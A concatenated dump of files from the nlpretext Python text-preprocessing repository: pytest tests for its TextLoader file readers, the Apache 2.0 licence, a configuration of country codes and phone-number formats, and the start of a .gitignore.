143 | file_format = "csv" 144 | encoding = "utf-8" 145 | text_column = "text" 146 | 147 | text_ddf = dd.from_pandas( 148 | pd.DataFrame({text_column: ["This is a text", "This is another text"]}), 149 | npartitions=2, 150 | ) 151 | mock_read_csv.return_value = text_ddf 152 | 153 | expected_result = text_ddf[[text_column]] 154 | 155 | # When 156 | dummy_instance = TextLoader(file_format=file_format, encoding=encoding, text_column=text_column) 157 | actual_result = dummy_instance._read_text_csv(files_path) 158 | 159 | # Then 160 | mock_read_csv.assert_called_once_with(files_path, encoding=encoding) 161 | assert_frame_equal(expected_result.compute(), actual_result.compute()) 162 | 163 | 164 | @patch("nlpretext._utils.pandasloader.read_csv") 165 | def test__read_text_csv_pandas(mock_read): 166 | # Given 167 | files_path = "some_path/to_read.txt" 168 | file_format = "txt" 169 | encoding = "utf-8" 170 | text_column = "text" 171 | 172 | dummy_instance = TextLoader( 173 | file_format=file_format, 174 | use_dask=False, 175 | encoding=encoding, 176 | text_column=text_column, 177 | ) 178 | dummy_instance._read_text_csv(files_path) 179 | 180 | # Then 181 | mock_read.assert_called_once_with(files_path, encoding=encoding) 182 | 183 | 184 | @patch("dask.dataframe.read_parquet") 185 | def test__read_text_parquet_dask(mock_read_parquet): 186 | # Given 187 | files_path = "some_path/to_read.parquet" 188 | file_format = "parquet" 189 | encoding = "utf-8" 190 | text_column = "text" 191 | 192 | text_ddf = dd.from_pandas( 193 | pd.DataFrame({text_column: ["This is a text", "This is another text"]}), 194 | npartitions=2, 195 | ) 196 | mock_read_parquet.return_value = text_ddf 197 | 198 | expected_result = text_ddf[[text_column]] 199 | 200 | # When 201 | dummy_instance = TextLoader(file_format=file_format, encoding=encoding, text_column=text_column) 202 | actual_result = dummy_instance._read_text_parquet(files_path) 203 | 204 | # Then 205 | mock_read_parquet.assert_called_once_with(files_path, encoding=encoding) 206 | assert_frame_equal(expected_result.compute(), actual_result.compute()) 207 | 208 | 209 | @patch("nlpretext._utils.pandasloader.read_parquet") 210 | def test__read_text_parquet_pandas(mock_read): 211 | # Given 212 | files_path = "some_path/to_read.txt" 213 | file_format = "txt" 214 | encoding = "utf-8" 215 | text_column = "text" 216 | 217 | dummy_instance = TextLoader( 218 | file_format=file_format, 219 | use_dask=False, 220 | encoding=encoding, 221 | text_column=text_column, 222 | ) 223 | dummy_instance._read_text_parquet(files_path) 224 | 225 | # Then 226 | mock_read.assert_called_once_with(files_path, encoding=encoding) 227 | 228 | 229 | @pytest.mark.parametrize( 230 | "files_path, file_format, encoding, compute_to_pandas, preprocessor, expected_format, raised", 231 | [ 232 | ("text_file1.json", None, None, True, None, "json", None), 233 | ("text_file2.json", "json", None, True, None, "json", None), 234 | ("text_file3.csv", None, "utf-8", True, None, "csv", None), 235 | ("text_file4.csv", None, None, False, None, "csv", None), 236 | ("text_file3.parquet", None, "utf-8", True, None, "parquet", None), 237 | ("text_file4.parquet", None, None, False, None, "parquet", None), 238 | ("text_file5.pdf", "pdf", None, False, None, "csv", "Format not handled"), 239 | ("text_file6.txt", None, None, False, Preprocessor(), "txt", None), 240 | ( 241 | "text_file8.txt", 242 | None, 243 | None, 244 | False, 245 | MagicMock(), 246 | "txt", 247 | "Only NLPretext preprocessors can be specified", 248 | ), 249 | ], 250 | ) 251 | @patch("nlpretext.preprocessor.Preprocessor.run", return_value="This is a text", autospec=True) 252 | @patch("nlpretext.textloader.TextLoader._read_text_json") 253 | @patch("nlpretext.textloader.TextLoader._read_text_txt") 254 | @patch("nlpretext.textloader.TextLoader._read_text_csv") 255 | @patch("nlpretext.textloader.TextLoader._read_text_parquet") 256 | @patch("nlpretext.textloader.check_text_file_format") 257 | def test_read_text( 258 | mock_check_text_file_format, 259 | mock__read_text_parquet, 260 | mock__read_text_csv, 261 | mock__read_text_txt, 262 | mock__read_text_json, 263 | mock_run, 264 | files_path, 265 | file_format, 266 | encoding, 267 | compute_to_pandas, 268 | preprocessor, 269 | expected_format, 270 | raised, 271 | ): 272 | # Given 273 | text_column = "text" 274 | if encoding is None: 275 | encoding = "utf-8" 276 | 277 | if file_format is None: 278 | mock_check_text_file_format.return_value = expected_format 279 | 280 | mock_reader_mapping = { 281 | "csv": mock__read_text_csv, 282 | "txt": mock__read_text_txt, 283 | "json": mock__read_text_json, 284 | "parquet": mock__read_text_parquet, 285 | } 286 | 287 | expected_result = dd.from_pandas( 288 | pd.DataFrame({text_column: ["Text with #", "Text with double space"]}), 289 | npartitions=2, 290 | ) 291 | mock_reader_mapping.get(expected_format).return_value = expected_result # type: ignore 292 | 293 | # When 294 | dummy_textloader = TextLoader( 295 | text_column=text_column, encoding=encoding, file_format=file_format 296 | ) 297 | 298 | if raised is None: 299 | actual_result = dummy_textloader.read_text( 300 | files_path, file_format, encoding, compute_to_pandas, preprocessor 301 | ) 302 | 303 | # Then 304 | if file_format is None: 305 | mock_check_text_file_format.assert_called_once_with(files_path) 306 | 307 | mock_reader_mapping[expected_format].assert_called_once_with(files_path) 308 | 309 | if preprocessor is not None: 310 | if isinstance(preprocessor, Preprocessor): 311 | mock_run.assert_called() 312 | preprocessed_texts = ["Text with", "Text with double space"] 313 | mock_run.side_effect = preprocessed_texts 314 | expected_result = dd.from_pandas( 315 | pd.DataFrame({text_column: preprocessed_texts}), npartitions=2 316 | ) 317 | 318 | if not compute_to_pandas: 319 | actual_result = actual_result.compute() 320 | assert_frame_equal(expected_result.compute(), actual_result) 321 | 322 | else: 323 | with pytest.raises(ValueError, match=raised): 324 | dummy_textloader.read_text( 325 | files_path, file_format, encoding, compute_to_pandas, preprocessor 326 | ) 327 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | Apache License 2 | Version 2.0, January 2004 3 | http://www.apache.org/licenses/ 4 | 5 | TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION 6 | 7 | 1. Definitions. 8 | 9 | "License" shall mean the terms and conditions for use, reproduction, 10 | and distribution as defined by Sections 1 through 9 of this document. 11 | 12 | "Licensor" shall mean the copyright owner or entity authorized by 13 | the copyright owner that is granting the License. 14 | 15 | "Legal Entity" shall mean the union of the acting entity and all 16 | other entities that control, are controlled by, or are under common 17 | control with that entity. For the purposes of this definition, 18 | "control" means (i) the power, direct or indirect, to cause the 19 | direction or management of such entity, whether by contract or 20 | otherwise, or (ii) ownership of fifty percent (50%) or more of the 21 | outstanding shares, or (iii) beneficial ownership of such entity. 22 | 23 | "You" (or "Your") shall mean an individual or Legal Entity 24 | exercising permissions granted by this License. 25 | 26 | "Source" form shall mean the preferred form for making modifications, 27 | including but not limited to software source code, documentation 28 | source, and configuration files. 29 | 30 | "Object" form shall mean any form resulting from mechanical 31 | transformation or translation of a Source form, including but 32 | not limited to compiled object code, generated documentation, 33 | and conversions to other media types. 34 | 35 | "Work" shall mean the work of authorship, whether in Source or 36 | Object form, made available under the License, as indicated by a 37 | copyright notice that is included in or attached to the work 38 | (an example is provided in the Appendix below). 39 | 40 | "Derivative Works" shall mean any work, whether in Source or Object 41 | form, that is based on (or derived from) the Work and for which the 42 | editorial revisions, annotations, elaborations, or other modifications 43 | represent, as a whole, an original work of authorship. For the purposes 44 | of this License, Derivative Works shall not include works that remain 45 | separable from, or merely link (or bind by name) to the interfaces of, 46 | the Work and Derivative Works thereof. 47 | 48 | "Contribution" shall mean any work of authorship, including 49 | the original version of the Work and any modifications or additions 50 | to that Work or Derivative Works thereof, that is intentionally 51 | submitted to Licensor for inclusion in the Work by the copyright owner 52 | or by an individual or Legal Entity authorized to submit on behalf of 53 | the copyright owner. For the purposes of this definition, "submitted" 54 | means any form of electronic, verbal, or written communication sent 55 | to the Licensor or its representatives, including but not limited to 56 | communication on electronic mailing lists, source code control systems, 57 | and issue tracking systems that are managed by, or on behalf of, the 58 | Licensor for the purpose of discussing and improving the Work, but 59 | excluding communication that is conspicuously marked or otherwise 60 | designated in writing by the copyright owner as "Not a Contribution." 61 | 62 | "Contributor" shall mean Licensor and any individual or Legal Entity 63 | on behalf of whom a Contribution has been received by Licensor and 64 | subsequently incorporated within the Work. 65 | 66 | 2. Grant of Copyright License. Subject to the terms and conditions of 67 | this License, each Contributor hereby grants to You a perpetual, 68 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 69 | copyright license to reproduce, prepare Derivative Works of, 70 | publicly display, publicly perform, sublicense, and distribute the 71 | Work and such Derivative Works in Source or Object form. 72 | 73 | 3. Grant of Patent License. Subject to the terms and conditions of 74 | this License, each Contributor hereby grants to You a perpetual, 75 | worldwide, non-exclusive, no-charge, royalty-free, irrevocable 76 | (except as stated in this section) patent license to make, have made, 77 | use, offer to sell, sell, import, and otherwise transfer the Work, 78 | where such license applies only to those patent claims licensable 79 | by such Contributor that are necessarily infringed by their 80 | Contribution(s) alone or by combination of their Contribution(s) 81 | with the Work to which such Contribution(s) was submitted. If You 82 | institute patent litigation against any entity (including a 83 | cross-claim or counterclaim in a lawsuit) alleging that the Work 84 | or a Contribution incorporated within the Work constitutes direct 85 | or contributory patent infringement, then any patent licenses 86 | granted to You under this License for that Work shall terminate 87 | as of the date such litigation is filed. 88 | 89 | 4. Redistribution. You may reproduce and distribute copies of the 90 | Work or Derivative Works thereof in any medium, with or without 91 | modifications, and in Source or Object form, provided that You 92 | meet the following conditions: 93 | 94 | (a) You must give any other recipients of the Work or 95 | Derivative Works a copy of this License; and 96 | 97 | (b) You must cause any modified files to carry prominent notices 98 | stating that You changed the files; and 99 | 100 | (c) You must retain, in the Source form of any Derivative Works 101 | that You distribute, all copyright, patent, trademark, and 102 | attribution notices from the Source form of the Work, 103 | excluding those notices that do not pertain to any part of 104 | the Derivative Works; and 105 | 106 | (d) If the Work includes a "NOTICE" text file as part of its 107 | distribution, then any Derivative Works that You distribute must 108 | include a readable copy of the attribution notices contained 109 | within such NOTICE file, excluding those notices that do not 110 | pertain to any part of the Derivative Works, in at least one 111 | of the following places: within a NOTICE text file distributed 112 | as part of the Derivative Works; within the Source form or 113 | documentation, if provided along with the Derivative Works; or, 114 | within a display generated by the Derivative Works, if and 115 | wherever such third-party notices normally appear. The contents 116 | of the NOTICE file are for informational purposes only and 117 | do not modify the License. You may add Your own attribution 118 | notices within Derivative Works that You distribute, alongside 119 | or as an addendum to the NOTICE text from the Work, provided 120 | that such additional attribution notices cannot be construed 121 | as modifying the License. 122 | 123 | You may add Your own copyright statement to Your modifications and 124 | may provide additional or different license terms and conditions 125 | for use, reproduction, or distribution of Your modifications, or 126 | for any such Derivative Works as a whole, provided Your use, 127 | reproduction, and distribution of the Work otherwise complies with 128 | the conditions stated in this License. 129 | 130 | 5. Submission of Contributions. Unless You explicitly state otherwise, 131 | any Contribution intentionally submitted for inclusion in the Work 132 | by You to the Licensor shall be under the terms and conditions of 133 | this License, without any additional terms or conditions. 134 | Notwithstanding the above, nothing herein shall supersede or modify 135 | the terms of any separate license agreement you may have executed 136 | with Licensor regarding such Contributions. 137 | 138 | 6. Trademarks. This License does not grant permission to use the trade 139 | names, trademarks, service marks, or product names of the Licensor, 140 | except as required for reasonable and customary use in describing the 141 | origin of the Work and reproducing the content of the NOTICE file. 142 | 143 | 7. Disclaimer of Warranty. Unless required by applicable law or 144 | agreed to in writing, Licensor provides the Work (and each 145 | Contributor provides its Contributions) on an "AS IS" BASIS, 146 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or 147 | implied, including, without limitation, any warranties or conditions 148 | of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A 149 | PARTICULAR PURPOSE. You are solely responsible for determining the 150 | appropriateness of using or redistributing the Work and assume any 151 | risks associated with Your exercise of permissions under this License. 152 | 153 | 8. Limitation of Liability. In no event and under no legal theory, 154 | whether in tort (including negligence), contract, or otherwise, 155 | unless required by applicable law (such as deliberate and grossly 156 | negligent acts) or agreed to in writing, shall any Contributor be 157 | liable to You for damages, including any direct, indirect, special, 158 | incidental, or consequential damages of any character arising as a 159 | result of this License or out of the use or inability to use the 160 | Work (including but not limited to damages for loss of goodwill, 161 | work stoppage, computer failure or malfunction, or any and all 162 | other commercial damages or losses), even if such Contributor 163 | has been advised of the possibility of such damages. 164 | 165 | 9. Accepting Warranty or Additional Liability. While redistributing 166 | the Work or Derivative Works thereof, You may choose to offer, 167 | and charge a fee for, acceptance of support, warranty, indemnity, 168 | or other liability obligations and/or rights consistent with this 169 | License. However, in accepting such obligations, You may act only 170 | on Your own behalf and on Your sole responsibility, not on behalf 171 | of any other Contributor, and only if You agree to indemnify, 172 | defend, and hold each Contributor harmless for any liability 173 | incurred by, or claims asserted against, such Contributor by reason 174 | of your accepting any such warranty or additional liability. 175 | 176 | END OF TERMS AND CONDITIONS 177 | 178 | APPENDIX: How to apply the Apache License to your work. 179 | 180 | To apply the Apache License to your work, attach the following 181 | boilerplate notice, with the fields enclosed by brackets "[]" 182 | replaced with your own identifying information. (Don't include 183 | the brackets!) The text should be enclosed in the appropriate 184 | comment syntax for the file format. We also recommend that a 185 | file or class name and description of purpose be included on the 186 | same "printed page" as the copyright notice for easier 187 | identification within third-party archives. 188 | 189 | Copyright [yyyy] [name of copyright owner] 190 | 191 | Licensed under the Apache License, Version 2.0 (the "License"); 192 | you may not use this file except in compliance with the License. 193 | You may obtain a copy of the License at 194 | 195 | http://www.apache.org/licenses/LICENSE-2.0 196 | 197 | Unless required by applicable law or agreed to in writing, software 198 | distributed under the License is distributed on an "AS IS" BASIS, 199 | WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 200 | See the License for the specific language governing permissions and 201 | limitations under the License. 202 | © 2021 GitHub, Inc. 203 | Terms 204 | Privacy 205 | Security 206 | Status 207 | Docs 208 | Contact GitHub 209 | Pricing 210 | API 211 | Training 212 | Blog 213 | About 214 | -------------------------------------------------------------------------------- /nlpretext/_config/config.py: -------------------------------------------------------------------------------- 1 | # GNU Lesser General Public License v3.0 only 2 | # Copyright (C) 2020 Artefact 3 | # licence-information@artefact.com 4 | # 5 | # This program is free software; you can redistribute it and/or 6 | # modify it under the terms of the GNU Lesser General Public 7 | # License as published by the Free Software Foundation; either 8 | # version 3 of the License, or (at your option) any later version. 9 | # 10 | # This program is distributed in the hope that it will be useful, 11 | # but WITHOUT ANY WARRANTY; without even the implied warranty of 12 | # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU 13 | # Lesser General Public License for more details. 14 | # 15 | # You should have received a copy of the GNU Lesser General Public License 16 | # along with this program; if not, write to the Free Software Foundation, 17 | # Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA. 18 | #!/usr/local/bin/python3 19 | from typing import List, Optional 20 | 21 | import os 22 | 23 | import phonenumbers as _phonenumbers 24 | 25 | ROOT_FOLDER = os.path.abspath(os.path.join(os.path.dirname(__file__), "../..")) 26 | 27 | # Country config 28 | COUNTRY_MAPPING_ISO = { 29 | "af": "Afghanistan", 30 | "ax": "Åland Islands", 31 | "al": "Albania", 32 | "dz": "Algeria", 33 | "as": "American Samoa", 34 | "ad": "Andorra", 35 | "ao": "Angola", 36 | "ai": "Anguilla", 37 | "aq": "Antarctica", 38 | "ag": "Antigua and Barbuda", 39 | "ar": "Argentina", 40 | "am": "Armenia", 41 | "aw": "Aruba", 42 | "au": "Australia", 43 | "at": "Austria", 44 | "az": "Azerbaijan", 45 | "bs": "Bahamas", 46 | "bh": "Bahrain", 47 | "bd": "Bangladesh", 48 | "bb": "Barbados", 49 | "by": "Belarus", 50 | "be": "Belgium", 51 | "bz": "Belize", 52 | "bj": "Benin", 53 | "bm": "Bermuda", 54 | "bt": "Bhutan", 55 | "bo": "Bolivia (Plurinational State of)", 56 | "bq": "Bonaire, Sint Eustatius and Saba", 57 | "ba": "Bosnia and Herzegovina", 58 | "bw": "Botswana", 59 | "bv": "Bouvet Island", 60 | "br": "Brazil", 61 | "io": "British Indian Ocean Territory", 62 | "bn": "Brunei Darussalam", 63 | "bg": "Bulgaria", 64 | "bf": "Burkina Faso", 65 | "bi": "Burundi", 66 | "cv": "Cabo Verde", 67 | "kh": "Cambodia", 68 | "cm": "Cameroon", 69 | "ca": "Canada", 70 | "ky": "Cayman Islands", 71 | "cf": "Central African Republic", 72 | "td": "Chad", 73 | "cl": "Chile", 74 | "cn": "China", 75 | "cx": "Christmas Island", 76 | "cc": "Cocos (Keeling) Islands", 77 | "co": "Colombia", 78 | "km": "Comoros", 79 | "cg": "Congo", 80 | "cd": "Congo, Democratic Republic of the", 81 | "ck": "Cook Islands", 82 | "cr": "Costa Rica", 83 | "ci": "Côte d'Ivoire", 84 | "hr": "Croatia", 85 | "cu": "Cuba", 86 | "cw": "Curaçao", 87 | "cy": "Cyprus", 88 | "cz": "Czechia", 89 | "dk": "Denmark", 90 | "dj": "Djibouti", 91 | "dm": "Dominica", 92 | "do": "Dominican Republic", 93 | "ec": "Ecuador", 94 | "eg": "Egypt", 95 | "sv": "El Salvador", 96 | "gq": "Equatorial Guinea", 97 | "er": "Eritrea", 98 | "ee": "Estonia", 99 | "sz": "Eswatini", 100 | "et": "Ethiopia", 101 | "fk": "Falkland Islands (Malvinas)", 102 | "fo": "Faroe Islands", 103 | "fj": "Fiji", 104 | "fi": "Finland", 105 | "fr": "France", 106 | "gf": "French Guiana", 107 | "pf": "French Polynesia", 108 | "tf": "French Southern Territories", 109 | "ga": "Gabon", 110 | "gm": "Gambia", 111 | "ge": "Georgia", 112 | "de": "Germany", 113 | "gh": "Ghana", 114 | "gi": "Gibraltar", 115 | "gr": "Greece", 116 | "gl": "Greenland", 117 | "gd": "Grenada", 118 | "gp": "Guadeloupe", 119 | "gu": "Guam", 120 | "gt": "Guatemala", 121 | "gg": "Guernsey", 122 | "gn": "Guinea", 123 | "gw": "Guinea-Bissau", 124 | "gy": "Guyana", 125 | "ht": "Haiti", 126 | "hm": "Heard Island and McDonald Islands", 127 | "va": "Holy See", 128 | "hn": "Honduras", 129 | "hk": "Hong Kong", 130 | "hu": "Hungary", 131 | "is": "Iceland", 132 | "in": "India", 133 | "id": "Indonesia", 134 | "ir": "Iran (Islamic Republic of)", 135 | "iq": "Iraq", 136 | "ie": "Ireland", 137 | "im": "Isle of Man", 138 | "il": "Israel", 139 | "it": "Italy", 140 | "jm": "Jamaica", 141 | "jp": "Japan", 142 | "je": "Jersey", 143 | "jo": "Jordan", 144 | "kz": "Kazakhstan", 145 | "ke": "Kenya", 146 | "ki": "Kiribati", 147 | "kp": "Korea (Democratic People's Republic of)", 148 | "kr": "Korea, Republic of", 149 | "kw": "Kuwait", 150 | "kg": "Kyrgyzstan", 151 | "la": "Lao People's Democratic Republic", 152 | "lv": "Latvia", 153 | "lb": "Lebanon", 154 | "ls": "Lesotho", 155 | "lr": "Liberia", 156 | "ly": "Libya", 157 | "li": "Liechtenstein", 158 | "lt": "Lithuania", 159 | "lu": "Luxembourg", 160 | "mo": "Macao", 161 | "mg": "Madagascar", 162 | "mw": "Malawi", 163 | "my": "Malaysia", 164 | "mv": "Maldives", 165 | "ml": "Mali", 166 | "mt": "Malta", 167 | "mh": "Marshall Islands", 168 | "mq": "Martinique", 169 | "mr": "Mauritania", 170 | "mu": "Mauritius", 171 | "yt": "Mayotte", 172 | "mx": "Mexico", 173 | "fm": "Micronesia (Federated States of)", 174 | "md": "Moldova, Republic of", 175 | "mc": "Monaco", 176 | "mn": "Mongolia", 177 | "me": "Montenegro", 178 | "ms": "Montserrat", 179 | "ma": "Morocco", 180 | "mz": "Mozambique", 181 | "mm": "Myanmar", 182 | "na": "Namibia", 183 | "nr": "Nauru", 184 | "np": "Nepal", 185 | "nl": "Netherlands", 186 | "nc": "New Caledonia", 187 | "nz": "New Zealand", 188 | "ni": "Nicaragua", 189 | "ne": "Niger", 190 | "ng": "Nigeria", 191 | "nu": "Niue", 192 | "nf": "Norfolk Island", 193 | "mk": "North Macedonia", 194 | "mp": "Northern Mariana Islands", 195 | "no": "Norway", 196 | "om": "Oman", 197 | "pk": "Pakistan", 198 | "pw": "Palau", 199 | "ps": "Palestine, State of", 200 | "pa": "Panama", 201 | "pg": "Papua New Guinea", 202 | "py": "Paraguay", 203 | "pe": "Peru", 204 | "ph": "Philippines", 205 | "pn": "Pitcairn", 206 | "pl": "Poland", 207 | "pt": "Portugal", 208 | "pr": "Puerto Rico", 209 | "qa": "Qatar", 210 | "re": "Réunion", 211 | "ro": "Romania", 212 | "ru": "Russian Federation", 213 | "rw": "Rwanda", 214 | "bl": "Saint Barthélemy", 215 | "sh": "Saint Helena, Ascension and Tristan da Cunha", 216 | "kn": "Saint Kitts and Nevis", 217 | "lc": "Saint Lucia", 218 | "mf": "Saint Martin (French part)", 219 | "pm": "Saint Pierre and Miquelon", 220 | "vc": "Saint Vincent and the Grenadines", 221 | "ws": "Samoa", 222 | "sm": "San Marino", 223 | "st": "Sao Tome and Principe", 224 | "sa": "Saudi Arabia", 225 | "sn": "Senegal", 226 | "rs": "Serbia", 227 | "sc": "Seychelles", 228 | "sl": "Sierra Leone", 229 | "sg": "Singapore", 230 | "sx": "Sint Maarten (Dutch part)", 231 | "sk": "Slovakia", 232 | "si": "Slovenia", 233 | "sb": "Solomon Islands", 234 | "so": "Somalia", 235 | "za": "South Africa", 236 | "gs": "South Georgia and the South Sandwich Islands", 237 | "ss": "South Sudan", 238 | "es": "Spain", 239 | "lk": "Sri Lanka", 240 | "sd": "Sudan", 241 | "sr": "Suriname", 242 | "sj": "Svalbard and Jan Mayen", 243 | "se": "Sweden", 244 | "ch": "Switzerland", 245 | "sy": "Syrian Arab Republic", 246 | "tw": "Taiwan, Province of China", 247 | "tj": "Tajikistan", 248 | "tz": "Tanzania, United Republic of", 249 | "th": "Thailand", 250 | "tl": "Timor-Leste", 251 | "tg": "Togo", 252 | "tk": "Tokelau", 253 | "to": "Tonga", 254 | "tt": "Trinidad and Tobago", 255 | "tn": "Tunisia", 256 | "tr": "Turkey", 257 | "tm": "Turkmenistan", 258 | "tc": "Turks and Caicos Islands", 259 | "tv": "Tuvalu", 260 | "ug": "Uganda", 261 | "ua": "Ukraine", 262 | "ae": "United Arab Emirates", 263 | "gb": "United Kingdom of Great Britain and Northern Ireland", 264 | "us": "United States of America", 265 | "um": "United States Minor Outlying Islands", 266 | "uy": "Uruguay", 267 | "uz": "Uzbekistan", 268 | "vu": "Vanuatu", 269 | "ve": "Venezuela (Bolivarian Republic of)", 270 | "vn": "Viet Nam", 271 | "vg": "Virgin Islands (British)", 272 | "vi": "Virgin Islands (U.S.)", 273 | "wf": "Wallis and Futuna", 274 | "eh": "Western Sahara", 275 | "ye": "Yemen", 276 | "zm": "Zambia", 277 | "zw": "Zimbabwe", 278 | } 279 | 280 | # Phone numbers config 281 | SUPPORTED_COUNTRY: List[Optional[str]] = [ 282 | None, 283 | "US", 284 | "AG", 285 | "AI", 286 | "AS", 287 | "BB", 288 | "BM", 289 | "BS", 290 | "CA", 291 | "DM", 292 | "GD", 293 | "GU", 294 | "JM", 295 | "KN", 296 | "KY", 297 | "LC", 298 | "MP", 299 | "MS", 300 | "PR", 301 | "SX", 302 | "TC", 303 | "TT", 304 | "VC", 305 | "VG", 306 | "VI", 307 | "RU", 308 | "KZ", 309 | "EG", 310 | "ZA", 311 | "GR", 312 | "NL", 313 | "BE", 314 | "FR", 315 | "ES", 316 | "HU", 317 | "IT", 318 | "VA", 319 | "RO", 320 | "CH", 321 | "AT", 322 | "GB", 323 | "GG", 324 | "IM", 325 | "JE", 326 | "DK", 327 | "SE", 328 | "NO", 329 | "SJ", 330 | "PL", 331 | "DE", 332 | "PE", 333 | "MX", 334 | "CU", 335 | "AR", 336 | "BR", 337 | "CL", 338 | "CO", 339 | "VE", 340 | "MY", 341 | "AU", 342 | "CC", 343 | "CX", 344 | "ID", 345 | "PH", 346 | "NZ", 347 | "SG", 348 | "TH", 349 | "JP", 350 | "KR", 351 | "VN", 352 | "CN", 353 | "TR", 354 | "IN", 355 | "PK", 356 | "AF", 357 | "LK", 358 | "MM", 359 | "IR", 360 | "SS", 361 | "MA", 362 | "EH", 363 | "DZ", 364 | "TN", 365 | "LY", 366 | "GM", 367 | "SN", 368 | "MR", 369 | "ML", 370 | "GN", 371 | "CI", 372 | "BF", 373 | "NE", 374 | "TG", 375 | "BJ", 376 | "MU", 377 | "LR", 378 | "SL", 379 | "GH", 380 | "NG", 381 | "TD", 382 | "CF", 383 | "CM", 384 | "CV", 385 | "ST", 386 | "GQ", 387 | "GA", 388 | "CG", 389 | "CD", 390 | "AO", 391 | "GW", 392 | "IO", 393 | "AC", 394 | "SC", 395 | "SD", 396 | "RW", 397 | "ET", 398 | "SO", 399 | "DJ", 400 | "KE", 401 | "TZ", 402 | "UG", 403 | "BI", 404 | "MZ", 405 | "ZM", 406 | "MG", 407 | "RE", 408 | "YT", 409 | "ZW", 410 | "NA", 411 | "MW", 412 | "LS", 413 | "BW", 414 | "SZ", 415 | "KM", 416 | "SH", 417 | "TA", 418 | "ER", 419 | "AW", 420 | "FO", 421 | "GL", 422 | "GI", 423 | "PT", 424 | "LU", 425 | "IE", 426 | "IS", 427 | "AL", 428 | "MT", 429 | "CY", 430 | "FI", 431 | "AX", 432 | "BG", 433 | "LT", 434 | "LV", 435 | "EE", 436 | "MD", 437 | "AM", 438 | "BY", 439 | "AD", 440 | "MC", 441 | "SM", 442 | "UA", 443 | "RS", 444 | "ME", 445 | "XK", 446 | "HR", 447 | "SI", 448 | "BA", 449 | "MK", 450 | "CZ", 451 | "SK", 452 | "LI", 453 | "FK", 454 | "BZ", 455 | "GT", 456 | "SV", 457 | "HN", 458 | "NI", 459 | "CR", 460 | "PA", 461 | "PM", 462 | "HT", 463 | "GP", 464 | "BL", 465 | "MF", 466 | "BO", 467 | "GY", 468 | "EC", 469 | "GF", 470 | "PY", 471 | "MQ", 472 | "SR", 473 | "UY", 474 | "CW", 475 | "BQ", 476 | "TL", 477 | "NF", 478 | "BN", 479 | "NR", 480 | "PG", 481 | "TO", 482 | "SB", 483 | "VU", 484 | "FJ", 485 | "PW", 486 | "WF", 487 | "CK", 488 | "NU", 489 | "WS", 490 | "KI", 491 | "NC", 492 | "TV", 493 | "PF", 494 | "TK", 495 | "FM", 496 | "MH", 497 | "KP", 498 | "HK", 499 | "MO", 500 | "KH", 501 | "LA", 502 | "BD", 503 | "TW", 504 | "MV", 505 | "LB", 506 | "JO", 507 | "SY", 508 | "IQ", 509 | "KW", 510 | "SA", 511 | "YE", 512 | "OM", 513 | "PS", 514 | "AE", 515 | "IL", 516 | "BH", 517 | "QA", 518 | "BT", 519 | "MN", 520 | "NP", 521 | "TJ", 522 | "TM", 523 | "AZ", 524 | "GE", 525 | "KG", 526 | "UZ", 527 | "DO", 528 | ] 529 | 530 | FORMAT_NUMBERS = { 531 | "E164": _phonenumbers.PhoneNumberFormat.E164, 532 | "INTERNATIONAL": _phonenumbers.PhoneNumberFormat.INTERNATIONAL, 533 | "NATIONAL": _phonenumbers.PhoneNumberFormat.NATIONAL, 534 | "RFC3966": _phonenumbers.PhoneNumberFormat.RFC3966, 535 | } 536 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Created by https://www.gitignore.io/api/osx,python,pycharm,windows,visualstudio,visualstudiocode 2 | # Edit at https://www.gitignore.io/?templates=osx,python,pycharm,windows,visualstudio,visualstudiocode 3 | 4 | ### OSX ### 5 | # General 6 | .DS_Store 7 | .AppleDouble 8 | .LSOverride 9 | 10 | # Icon must end with two \r 11 | Icon 12 | 13 | # Thumbnails 14 | ._* 15 | 16 | # Files that might appear in the root of a volume 17 | .DocumentRevisions-V100 18 | .fseventsd 19 | .Spotlight-V100 20 | .TemporaryItems 21 | .Trashes 22 | .VolumeIcon.icns 23 | .com.apple.timemachine.donotpresent 24 | 25 | # Directories potentially created on remote AFP share 26 | .AppleDB 27 | .AppleDesktop 28 | Network Trash Folder 29 | Temporary Items 30 | .apdisk 31 | 32 | ### PyCharm ### 33 | # Covers JetBrains IDEs: IntelliJ, RubyMine, PhpStorm, AppCode, PyCharm, CLion, Android Studio and WebStorm 34 | # Reference: https://intellij-support.jetbrains.com/hc/en-us/articles/206544839 35 | 36 | # User-specific stuff 37 | .idea/ 38 | .idea/**/workspace.xml 39 | .idea/**/tasks.xml 40 | .idea/**/usage.statistics.xml 41 | .idea/**/dictionaries 42 | .idea/**/shelf 43 | 44 | # Generated files 45 | .idea/**/contentModel.xml 46 | 47 | # Sensitive or high-churn files 48 | .idea/**/dataSources/ 49 | .idea/**/dataSources.ids 50 | .idea/**/dataSources.local.xml 51 | .idea/**/sqlDataSources.xml 52 | .idea/**/dynamic.xml 53 | .idea/**/uiDesigner.xml 54 | .idea/**/dbnavigator.xml 55 | 56 | # Gradle 57 | .idea/**/gradle.xml 58 | .idea/**/libraries 59 | 60 | # Gradle and Maven with auto-import 61 | # When using Gradle or Maven with auto-import, you should exclude module files, 62 | # since they will be recreated, and may cause churn. Uncomment if using 63 | # auto-import. 64 | # .idea/modules.xml 65 | # .idea/*.iml 66 | # .idea/modules 67 | # *.iml 68 | # *.ipr 69 | 70 | # CMake 71 | cmake-build-*/ 72 | 73 | # Mongo Explorer plugin 74 | .idea/**/mongoSettings.xml 75 | 76 | # File-based project format 77 | *.iws 78 | 79 | # IntelliJ 80 | out/ 81 | 82 | # mpeltonen/sbt-idea plugin 83 | .idea_modules/ 84 | 85 | # JIRA plugin 86 | atlassian-ide-plugin.xml 87 | 88 | # Cursive Clojure plugin 89 | .idea/replstate.xml 90 | 91 | # Crashlytics plugin (for Android Studio and IntelliJ) 92 | com_crashlytics_export_strings.xml 93 | crashlytics.properties 94 | crashlytics-build.properties 95 | fabric.properties 96 | 97 | # Editor-based Rest Client 98 | .idea/httpRequests 99 | 100 | # Android studio 3.1+ serialized cache 